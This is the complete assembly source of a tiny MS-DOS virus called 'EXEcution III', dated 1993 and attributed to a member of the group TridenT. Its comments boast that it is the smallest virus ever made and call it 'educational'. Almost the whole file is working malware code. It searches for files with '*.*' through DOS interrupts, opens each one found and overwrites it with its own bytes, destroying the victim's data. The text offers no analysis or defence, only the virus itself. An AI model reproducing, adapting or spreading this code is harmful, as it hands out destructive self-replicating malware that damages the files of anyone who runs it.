; The EXEcution III Virus. ; ; Well, you're now the prouw owner of the smallest virus ever made! ; only 23 bytes long and ofcourse again very lame.. ; But what the heck, it's just an educational piece of code!! ; ; (C) 1993 by [DàRkRàY] of TridenT (Ooooooranje Boooooooven!) ; ; Tnx to myself, my assembler, DOS (yuck) and to John Tardy for his ; nice try to make the smallest (27 bytes and 25 bytes) virus... gotcha!! ;-)) ; ; BTW Don't forget, I only tested it unter DOS 5.0 so on other versions ; it might not work! _CODE SEGMENT ASSUME CS:_CODE ORG 100h START: ; That's where we're starting... FILE DB '*.*',0h ; Dummy instruction, SUB's 0FFh from CH MOV AH,4Eh ; Let's search! DO_IT: MOV DX,SI ; Make DX = 100h (offset file) INT 21h ; Search now dude! MOV AX,3D01h ; Hmm, infect that fucking file! MOV DX,9Eh ; Name is at DS:[9Eh] INT 21h ; Go do it! XCHG BX,AX ; Put the handle in BX MOV AH,40h ; Write myself! JMP DO_IT ; Use other routine _CODE ENDS END START ; If you don't like my english: Get lost, you can understand it!